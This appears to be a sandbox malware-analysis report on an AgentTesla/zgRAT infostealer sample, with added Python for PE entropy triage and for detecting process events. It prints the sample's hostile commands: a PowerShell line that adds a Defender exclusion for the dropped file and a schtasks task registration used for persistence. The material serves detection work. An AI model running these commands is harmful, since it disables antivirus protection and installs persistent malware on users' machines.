Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.37dada8.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.7080000.11.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35dfb50.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.35a9930.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.3613f70.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 0_2_00AE6E28
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 0_2_00AE6E18
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 0_2_00AE70B7
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 0_2_00AE70C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 15_2_02DBF378
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 15_2_02DBF6C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 15_2_060AB7F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 15_2_060AC540
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 15_2_060A7F63
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 15_2_060A0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 15_2_060A2120
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Binary or memory string: OriginalFilename vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.352372028.0000000007080000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameIVectorView.dllN vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.347535078.00000000037C2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameIVectorView.dllN vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.350476892.0000000005840000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCerbera.dll" vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346406018.00000000035A1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTHWQcdcVCNvnIeHOYeXsEFJEQgIJHy.exe4 vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTHWQcdcVCNvnIeHOYeXsEFJEQgIJHy.exe4 vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000000.253700124.00000000001F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePARAMD.exe" vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Binary or memory string: OriginalFilename vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.337227939.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTHWQcdcVCNvnIeHOYeXsEFJEQgIJHy.exe4 vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000000.326318211.0000000000A42000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamePARAMD.exe" vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.525745819.0000000000EF8000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Binary or memory string: OriginalFilenamePARAMD.exe" vs SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: HksvOcmoc.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | File read: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmpJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile created: C:\Users\user\AppData\Roaming\HksvOcmoc.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile created: C:\Users\user\AppData\Local\Temp\tmpCB43.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@1/1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_01
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, tI/Tn.csCryptographic APIs: 'CreateDecryptor'
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, tI/Tn.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.a40000.5.unpack, tI/Tn.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.a40000.5.unpack, tI/Tn.csCryptographic APIs: 'CreateDecryptor'
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: PARAMD.pdb source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, HksvOcmoc.exe.0.dr
                Source: Binary string: PARAMD.pdb8 source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, HksvOcmoc.exe.0.dr

Data Obfuscation

Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, tI/Tn.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 15.0.SecuriteInfo.com.W32.AIDetectNet.01.20229.exe.a40000.5.unpack, tI/Tn.cs | .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 0_2_0588317C push cs; iretd 0_2_0588317D
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Code function: 15_2_02DB6896 push FFFFFF8Bh; iretd 15_2_02DB689B
Source: initial sample | Static PE information: section name: .text entropy: 7.75075398615
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | File created: C:\Users\user\AppData\Roaming\HksvOcmoc.exe
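The two static signals in this section, an executable .text section carrying IMAGE_SCN_MEM_EXECUTE / IMAGE_SCN_CNT_CODE / IMAGE_SCN_MEM_READ and a .text entropy of 7.75 bits per byte, are what a packed payload looks like before anything runs. The Python below is an added example and not part of the Joe Sandbox report: it walks a PE section table with nothing but struct, computes Shannon entropy per section, and flags executable sections above a threshold, which is the same triage the report's "section name: .text entropy" line performs. The PE skeleton, its payload bytes and the 7.0 threshold are constructed assumptions for illustration; a real sample should go through a full PE parser.

```python
import math
import random
import struct

# Section characteristic bits from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
FLAG_NAMES = {  # insertion order mirrors the report's flag listing
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}
# Assumed triage threshold: compiler output rarely exceeds ~6.5 bits/byte,
# values near 8 mean compressed or encrypted content.
PACKED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Yield (name, characteristics, raw_bytes) for every section header.

    Minimal walk: MZ -> e_lfanew -> 'PE\\0\\0' -> COFF header -> skip the
    optional header -> 40-byte section table entries. Raises ValueError
    when the input is not a PE image.
    """
    if image[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size
    for i in range(num_sections):
        off = table + 40 * i
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        characteristics = struct.unpack_from("<I", image, off + 36)[0]
        yield (name.rstrip(b"\0").decode("ascii", "replace"),
               characteristics, image[raw_ptr:raw_ptr + raw_size])


def describe_sections(image: bytes) -> list:
    """Per-section summary in the report's style: flag names plus entropy."""
    summary = []
    for name, chars, raw in pe_sections(image):
        entropy = shannon_entropy(raw)
        summary.append({
            "name": name,
            "flags": [label for bit, label in FLAG_NAMES.items() if chars & bit],
            "entropy": round(entropy, 3),
            # executable + high entropy is the packed-payload signal
            "suspicious": bool(chars & IMAGE_SCN_MEM_EXECUTE) and entropy > PACKED_ENTROPY_THRESHOLD,
        })
    return summary


def build_sample_pe(text_payload: bytes, data_payload: bytes) -> bytes:
    """Constructed, non-runnable PE skeleton with a .text and a .data section.
    Only the fields pe_sections() reads are populated; the rest stay zero."""
    e_lfanew, opt_size = 0x40, 0xE0                    # PE32 optional header size
    table = e_lfanew + 4 + 20 + opt_size
    text_off = (table + 2 * 40 + 0x1FF) & ~0x1FF       # 512-byte file alignment
    data_off = (text_off + len(text_payload) + 0x1FF) & ~0x1FF
    image = bytearray(data_off + len(data_payload))
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, e_lfanew)
    image[e_lfanew:e_lfanew + 4] = b"PE\0\0"
    struct.pack_into("<HH", image, e_lfanew + 4, 0x14C, 2)   # i386, 2 sections
    struct.pack_into("<H", image, e_lfanew + 4 + 16, opt_size)
    sections = [
        (b".text", text_payload, text_off, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b".data", data_payload, data_off, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ]
    for i, (name, payload, off, chars) in enumerate(sections):
        entry = table + 40 * i
        struct.pack_into("<8sIIII", image, entry, name, len(payload), 0x1000 * (i + 1), len(payload), off)
        struct.pack_into("<I", image, entry + 36, chars)
        image[off:off + len(payload)] = payload
    return bytes(image)


# Constructed inputs: seeded pseudo-random bytes stand in for an encrypted
# payload, a repeating string for ordinary initialized data.
_rng = random.Random(20229)
PACKED_TEXT = bytes(_rng.getrandbits(8) for _ in range(8192))
PLAIN_DATA = b"initialized data\0" * 64
SAMPLE_PE = build_sample_pe(PACKED_TEXT, PLAIN_DATA)

if __name__ == "__main__":
    for section in describe_sections(SAMPLE_PE):
        print(section)
```

The .text entry comes back with the same three flag names the report prints and an entropy close to 8, so it trips the packed-payload check; the .data entry stays well under the threshold. Entropy alone is a weak signal (legitimately compressed resources also score high), which is why the check is gated on the section being executable.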

Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp"
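Together with the earlier process-creation lines (powershell.exe adding a Defender exclusion for the dropped HksvOcmoc.exe, and the sample re-launching its own image), the schtasks line above is the whole installer chain of this sample, and every step of it is visible in plain process-creation telemetry. The Python below is an added example, not part of the report: it runs three rules over constructed process-creation events shaped like the report's process tree and escalates when all three fire under one parent. The event layout, field names, regexes, severity labels and the shortened sample name are assumptions; in practice the same logic would read Sysmon Event ID 1 or an EDR equivalent.

```python
import re
from collections import defaultdict

# Paths a standard user can write to; exclusions and task definitions pointing
# here deserve more weight than ones under Program Files or System32.
USER_WRITABLE = re.compile(r"\\AppData\\(?:Roaming|Local)\\|\\Temp\\|\\Users\\Public\\", re.I)
# Quoted-or-bare argument value following a switch.
_ARG = r'(?:"([^"]+)"|(\S+))'

# Constructed process-creation events shaped like the report's process tree
# (pid, ppid, parent image, image, command line); these are not sandbox output.
EVENTS = [
    {"pid": 1, "ppid": 0, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Users\user\Desktop\sample.exe",
     "cmd": r'"C:\Users\user\Desktop\sample.exe"'},
    {"pid": 2, "ppid": 1, "parent": r"C:\Users\user\Desktop\sample.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe"'},
    {"pid": 3, "ppid": 1, "parent": r"C:\Users\user\Desktop\sample.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmp"'},
    {"pid": 4, "ppid": 1, "parent": r"C:\Users\user\Desktop\sample.exe",
     "image": r"C:\Users\user\Desktop\sample.exe",
     "cmd": r"C:\Users\user\Desktop\sample.exe"},
    # Benign control: an admin importing a task definition from Program Files.
    {"pid": 5, "ppid": 9, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r'schtasks /Create /TN "Backup\Nightly" /XML "C:\Program Files\Backup\nightly.xml"'},
]


def defender_exclusions(cmd: str) -> list:
    """Values excluded via Add-/Set-MpPreference -Exclusion*, if any."""
    if not re.search(r"\b(?:Add|Set)-MpPreference\b", cmd, re.I):
        return []
    return [a or b for a, b in re.findall(r"-Exclusion(?:Path|Process|Extension)\s+" + _ARG, cmd, re.I)]


def schtasks_xml_source(cmd: str):
    """XML definition path for 'schtasks /Create ... /XML <file>', else None."""
    if not re.search(r"/create\b", cmd, re.I):
        return None
    m = re.search(r"/xml\s+" + _ARG, cmd, re.I)
    return (m.group(1) or m.group(2)) if m else None


def evaluate(events) -> list:
    """Return (pid, rule, severity, detail) findings. Escalates when one parent
    trips all three rules, which is the chain this report documents."""
    findings, by_parent = [], defaultdict(set)

    def hit(ev, rule, severity, detail):
        findings.append((ev["pid"], rule, severity, detail))
        by_parent[ev["ppid"]].add(rule)

    for ev in events:
        image, cmd = ev["image"].lower(), ev["cmd"]
        if image.endswith("\\powershell.exe"):
            for path in defender_exclusions(cmd):
                hit(ev, "defender_exclusion_added",
                    "high" if USER_WRITABLE.search(path) else "medium", path)
        if image.endswith("\\schtasks.exe"):
            xml = schtasks_xml_source(cmd)
            if xml and USER_WRITABLE.search(xml):
                hit(ev, "scheduled_task_from_temp_xml", "high", xml)
        if image == ev["parent"].lower():          # child is a copy of its parent's image
            hit(ev, "self_spawn_same_image", "medium", ev["image"])

    chain = {"defender_exclusion_added", "scheduled_task_from_temp_xml", "self_spawn_same_image"}
    for ppid, rules in by_parent.items():
        if chain <= rules:
            findings.append((ppid, "loader_chain_exclusion_task_selfspawn", "critical",
                             "one parent added a Defender exclusion, registered a task from a "
                             "temp XML and re-spawned its own image"))
    return findings


if __name__ == "__main__":
    for finding in evaluate(EVENTS):
        print(finding)
```

The self-spawn rule is deliberately weak on its own (installers and browsers do it too), which is why it only carries weight in combination: the exclusion plus the task import from %TEMP% under the same parent is what separates this chain from an admin running schtasks /Create against a file in Program Files, as the control event shows.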
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
